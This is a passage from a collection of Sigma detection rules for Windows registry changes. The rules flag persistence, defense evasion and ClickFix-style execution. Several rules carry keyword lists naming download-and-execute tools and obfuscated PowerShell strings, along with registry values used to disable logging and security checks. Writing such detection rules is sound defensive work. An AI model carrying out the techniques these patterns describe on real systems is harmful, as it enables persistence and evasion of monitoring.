    "content": "title: Potential Persistence Via TypedPaths\nid: 086ae989-9ca6-4fe7-895a-759c5544f247\nstatus: test\ndescription: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt\nreferences:\n    - https://twitter.com/dez_/status/1560101453150257154\n    - https://forensafe.com/blogs/typedpaths.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\'\n    filter:\n        Image:\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\SysWOW64\\explorer.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_xll.yml",
    "content": "title: Potential Persistence Via Excel Add-in - Registry\nid: 961e33d1-4f86-4fcf-80ab-930a708b2f82\nstatus: test\ndescription: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md\n    - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\nauthor: frack113\ndate: 2023-01-15\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137.006\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: 'Software\\Microsoft\\Office\\'\n        TargetObject|endswith: '\\Excel\\Options'\n        Details|startswith: '/R '\n        Details|endswith: '.xll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml",
    "content": "title: Potential Attachment Manager Settings Associations Tamper\nid: a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47\nstatus: test\ndescription: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)\nreferences:\n    - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738\n    - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations\\'\n    selection_value_default_file_type_rsik:\n        TargetObject|endswith: '\\DefaultFileTypeRisk'\n        Details: 'DWORD (0x00006152)'\n    selection_value_low_risk_filetypes:\n        TargetObject|endswith: '\\LowRiskFileTypes'\n        Details|contains: # Add more as you see fit\n            - '.zip;'\n            - '.rar;'\n            - '.exe;'\n            - '.bat;'\n            - '.com;'\n            - '.cmd;'\n            - '.reg;'\n            - '.msi;'\n            - '.htm;'\n            - '.html;'\n    condition: selection_main and 1 of selection_value_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml",
    "content": "title: Potential Attachment Manager Settings Attachments Tamper\nid: ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a\nstatus: test\ndescription: Detects tampering with attachment manager settings policies attachments (See reference for more information)\nreferences:\n    - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738\n    - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments\\'\n    selection_value_hide_zone_info:\n        TargetObject|endswith: '\\HideZoneInfoOnProperties'\n        Details: 'DWORD (0x00000001)' # On\n    selection_value_save_zone_info:\n        TargetObject|endswith: '\\SaveZoneInformation'\n        Details: 'DWORD (0x00000002)' # Off\n    selection_value_scan_with_av:\n        TargetObject|endswith: '\\ScanWithAntiVirus'\n        Details: 'DWORD (0x00000001)' # Disabled\n    condition: selection_main and 1 of selection_value_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml",
    "content": "title: Potential ClickFix Execution Pattern - Registry\nid: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb\nrelated:\n    - id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.\n    ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.\n    Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,\n    such as one-liners that execute remotely hosted malicious files or scripts.\nreferences:\n    - https://github.com/JohnHammond/recaptcha-phish\n    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware\n    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/\n    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2\n    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution\n    - https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724\n    - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/\n    - https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493\n    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-03-25\nmodified: 2025-11-19\ntags:\n    - attack.execution\n    - attack.t1204.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_registry:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\'\n    selection_details:\n        Details|contains:\n            - 'http://'\n            - 'https://'\n    selection_susp_pattern:\n        - Details|contains:\n              # Add more suspicious keywords\n              - 'account'\n              - 'anti-bot'\n              - 'botcheck'\n              - 'captcha'\n              - 'challenge'\n              - 'confirmation'\n              - 'fraud'\n              - 'human'\n              - 'identification'\n              - 'identificator'\n              - 'identity'\n              - 'robot'\n              - 'validation'\n              - 'verification'\n              - 'verify'\n        - Details|contains:\n              - '%comspec%'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'cmd'\n              - 'cscript'\n              - 'curl'\n              - 'finger'\n              - 'mshta'\n              - 'powershell'\n              - 'pwsh'\n              - 'regsvr32'\n              - 'rundll32'\n              - 'schtasks'\n              - 'wget'\n              - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate applications using RunMRU with HTTP links\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_potential_oci_dll_redirection.yml",
    "content": "title: Registry Modification for OCI DLL Redirection\nid: c0e0bdec-3e3d-47aa-9974-05539c999c89\nstatus: experimental\ndescription: |\n    Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.\n    Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.\nreferences:\n    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-24\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1574.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_ocilib:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLib'\n    filter_main_ocilib_file:\n        # it is looking when oci.dll name is changed to something else like evil.dll\n        Details|contains: 'oci.dll'\n    selection_ocilibpath:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLibPath'\n    filter_main_ocilibpath:\n        # it is looking when oci.dll path is changed to something else like 'C:\\Windows\\Temp\\'\n        Details|contains: '%SystemRoot%\\System32\\'\n    condition: (selection_ocilib and not filter_main_ocilib_file) or (selection_ocilibpath and not filter_main_ocilibpath)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_as_service.yml",
    "content": "title: PowerShell as a Service in Registry\nid: 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d\nstatus: test\ndescription: Detects that a powershell code is written to the registry as a service.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2023-08-17\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml",
    "content": "title: PowerShell Script Execution Policy Enabled\nid: 8218c875-90b9-42e2-b60d-0b0069816d10\nrelated:\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814\n      type: derived\nstatus: test\ndescription: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.\nreferences:\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-10-18\ntags:\n    - attack.execution\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml",
    "content": "title: Potential PowerShell Execution Policy Tampering\nid: fad91067-08c5-4d1a-8d8c-d96a21b37814\nrelated:\n    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry\n      type: similar\n    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet\n      type: similar\n    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2023-12-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            # Note for future readers: For PowerShell 7+ the ExecutionPolicy is handled via a setting file due to the fact that PWSH7 is available for mac and linux\n            # Attackers can create a per-user setting file (powershell.config.json) and set the execution policy there\n            # Learn more here: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_config?view=powershell-7.3\n            - '\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy'\n            - '\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy'\n        Details|contains:\n            - 'Bypass'\n            - 'Unrestricted'\n    filter_main_svchost:\n        # Note: We filter out \"svchost\" to avoid FP with changes using \"gpedit\" for example.\n        Image|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml",
    "content": "title: Suspicious PowerShell In Registry Run Keys\nid: 8d85cf08-bf97-4260-ba49-986a2a65129c\nstatus: test\ndescription: Detects potential PowerShell commands or code within registry run keys\nreferences:\n    - https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry\n    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-03-17\nmodified: 2025-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' # Also covers \"RunOnce\" and \"RunOnceEx\"\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n        Details|contains:\n            - 'powershell'\n            - 'pwsh '\n            - 'FromBase64String'\n            - '.DownloadFile('\n            - '.DownloadString('\n            - ' -w hidden '\n            - ' -w 1 '\n            - '-windowstyle hidden'\n            - '-window hidden'\n            - ' -nop '\n            - ' -encodedcommand '\n            - '-ExecutionPolicy Bypass'\n            - 'Invoke-Expression'\n            - 'IEX ('\n            - 'Invoke-Command'\n            - 'ICM -'\n            - 'Invoke-WebRequest'\n            - 'IWR '\n            - 'Invoke-RestMethod'\n            - 'IRM '\n            - ' -noni '\n            - ' -noninteractive '\n    condition: selection\nfalsepositives:\n    - Legitimate admin or third party scripts. Baseline according to your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml",
    "content": "title: PowerShell Logging Disabled Via Registry Key Tampering\nid: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7\nstatus: test\ndescription: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled\nauthor: frack113\ndate: 2022-04-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\n    - attack.t1112\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\PowerShell\\' # PowerShell 5\n            - '\\Microsoft\\PowerShellCore\\' # PowerShell 7\n        TargetObject|endswith:\n            - '\\ModuleLogging\\EnableModuleLogging'\n            - '\\ScriptBlockLogging\\EnableScriptBlockLogging'\n            - '\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging'\n            - '\\Transcription\\EnableTranscripting'\n            - '\\Transcription\\EnableInvocationHeader'\n            - '\\EnableScripts'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable PowerShell Logging via Registry\n      technique: T1112\n      atomic_guid: 95b25212-91a7-42ff-9613-124aca6845a8\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml",
    "content": "title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG\nid: 7021255e-5db3-4946-a8b9-0ba7a4644a69\nrelated:\n    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic\n      type: similar\n    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse\n      type: similar\n    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry\n      type: similar\nstatus: test\ndescription: Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-08-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: The registry key \"\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\\" and its subkey must be monitored'\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml",
    "content": "title: PUA - Sysinternal Tool Execution - Registry\nid: 25ffa65d-76d8-4da5-a832-3f2b0136e133\nstatus: test\ndescription: Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key\nreferences:\n    - https://twitter.com/Moti_B/status/1008587936735035392\nauthor: Markus Neis\ndate: 2017-08-28\nmodified: 2025-10-26\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\EulaAccepted'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SysInternals tools\n    - Programs that use the same Registry Key\nlevel: low\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml",
    "content": "title: Suspicious Execution Of Renamed Sysinternals Tools - Registry\nid: f50f3c09-557d-492d-81db-9064a8d4e211\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\n    - id: 8023f872-3f1d-4301-a384-801889917ab4\n      type: similar\nstatus: test\ndescription: Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-10-26\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            # Please add new values while respecting the alphabetical order\n            - '\\Active Directory Explorer'\n            - '\\Handle'\n            - '\\LiveKd'\n            - '\\ProcDump'\n            - '\\Process Explorer'\n            - '\\PsExec'\n            - '\\PsLoggedon'\n            - '\\PsLoglist'\n            - '\\PsPasswd'\n            - '\\PsPing'\n            - '\\PsService'\n            - '\\SDelete'\n        TargetObject|endswith: '\\EulaAccepted'\n    filter:\n        Image|endswith:\n            # Please add new values while respecting the alphabetical order\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n            - '\\livekd.exe'\n            - '\\livekd64.exe'\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\PsExec.exe'\n            - '\\PsExec64.exe'\n            - '\\PsLoggedon.exe'\n            - '\\PsLoggedon64.exe'\n            - '\\psloglist.exe'\n            - '\\psloglist64.exe'\n            - '\\pspasswd.exe'\n            - '\\pspasswd64.exe'\n            - '\\PsPing.exe'\n            - '\\PsPing64.exe'\n            - '\\PsService.exe'\n            - '\\PsService64.exe'\n            - '\\sdelete.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml",
    "content": "title: PUA - Sysinternals Tools Execution - Registry\nid: c7da8edc-49ae-45a2-9e61-9fd860e4e73d\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\n    - id: 9841b233-8df8-4ad7-9133-b0b4402a9014\n      type: obsolete\nstatus: test\ndescription: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.\nreferences:\n    - https://twitter.com/Moti_B/status/1008587936735035392\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-10-26\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Active Directory Explorer'\n            - '\\Handle'\n            - '\\LiveKd'\n            - '\\Process Explorer'\n            - '\\ProcDump'\n            - '\\PsExec'\n            - '\\PsLoglist'\n            - '\\PsPasswd'\n            - '\\SDelete'\n            - '\\Sysinternals' # Global level https://twitter.com/leonzandman/status/1561736801953382400\n        TargetObject|endswith: '\\EulaAccepted'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml",
    "content": "title: Usage of Renamed Sysinternals Tools - RegistrySet\nid: 8023f872-3f1d-4301-a384-801889917ab4\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\n    - id: f50f3c09-557d-492d-81db-9064a8d4e211\n      type: similar\nstatus: test\ndescription: Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2023-08-17\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\PsExec'\n            - '\\ProcDump'\n            - '\\Handle'\n            - '\\LiveKd'\n            - '\\Process Explorer'\n            - '\\PsLoglist'\n            - '\\PsPasswd'\n            - '\\Active Directory Explorer'\n        TargetObject|endswith: '\\EulaAccepted'\n    filter_main_image_names:\n        Image|endswith:\n            - '\\PsExec.exe'\n            - '\\PsExec64.exe'\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n            - '\\livekd.exe'\n            - '\\livekd64.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\psloglist.exe'\n            - '\\psloglist64.exe'\n            - '\\pspasswd.exe'\n            - '\\pspasswd64.exe'\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n    filter_optional_null:\n        Image: null # Race condition with some logging tools\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml",
    "content": "title: ETW Logging Disabled For rpcrt4.dll\nid: 90f342e1-1aaa-4e43-b092-39fda57ed11e\nstatus: test\ndescription: Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll\nreferences:\n    - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-09\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation'\n        Details:\n            # This is disabled by default for some reason\n            - 'DWORD (0x00000000)' # Off\n            - 'DWORD (0x00000002)' # Off with exceptions\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml",
    "content": "title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry\nid: a7df0e9e-91a5-459a-a003-4cde67c2ff5d\nrelated:\n    - id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\n    This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.\nreferences:\n    - https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf\n    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71\n    - https://www.forensafe.com/blogs/runmrukey.html\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/\nauthor: Ahmed Farouk, Nasreddine Bencherchali\ndate: 2024-11-01\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_key:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    selection_powershell_command:\n        Details|contains:\n            - 'powershell'\n            - 'pwsh'\n    selection_powershell_susp_keywords:\n        Details|contains:\n            - ' -e '\n            - ' -ec '\n            - ' -en '\n            - ' -enc '\n            - ' -enco'\n            - 'ftp'\n            - 'Hidden'\n            - 'http'\n            - 'iex'\n            - 'Invoke-'\n    selection_wmic_command:\n        Details|contains: 'wmic'\n    selection_wmic_susp_keywords:\n        Details|contains:\n            - 'shadowcopy'\n            - 'process call create'\n    condition: selection_key and (all of selection_powershell_* or all of selection_wmic_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml",
    "content": "title: ScreenSaver Registry Key Set\nid: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce\nstatus: test\ndescription: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl\nreferences:\n    - https://twitter.com/VakninHai/status/1517027824984547329\n    - https://twitter.com/pabraeken/status/998627081360695297\n    - https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files\nauthor: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)\ndate: 2022-05-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n    registry:\n        TargetObject|contains: '\\Control Panel\\Desktop\\SCRNSAVE.EXE'\n        Details|endswith: '.scr'\n    filter:\n        Details|contains:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and registry and not filter\nfalsepositives:\n    - Legitimate use of screen saver\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml",
    "content": "title: Potential SentinelOne Shell Context Menu Scan Command Tampering\nid: 6c304b02-06e6-402d-8be4-d5833cdf8198\nstatus: test\ndescription: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.\nreferences:\n    - https://mrd0x.com/sentinelone-persistence-via-menu-context/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-06\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\shell\\SentinelOneScan\\command\\'\n    filter_main_sentinelone_default_scan_binary:\n        Details|startswith:\n            - 'C:\\Program Files\\SentinelOne\\Sentinel Agent'\n            - 'C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent'\n        Details|contains: '\\SentinelScanFromContextMenu.exe'\n    filter_main_sentinelone_binary:\n        Image|endswith:\n            - 'C:\\Program Files\\SentinelOne\\'\n            - 'C:\\Program Files (x86)\\SentinelOne\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml",
    "content": "title: ServiceDll Hijack\nid: 612e47e9-8a59-43a6-b404-f48683f45bd6\nstatus: test\ndescription: |\n    Detects changes to the \"ServiceDLL\" value related to a service in the registry.\n    This is often used as a method of persistence.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time\n    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/\nauthor: frack113\ndate: 2022-02-04\nmodified: 2024-04-03\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\System\\'\n            - 'ControlSet'\n            - '\\Services\\'\n        TargetObject|endswith: '\\Parameters\\ServiceDll'\n    filter_main_printextensionmanger:\n        Details: 'C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll'\n    filter_main_domain_controller:\n        Image: 'C:\\Windows\\system32\\lsass.exe'\n        TargetObject|endswith: 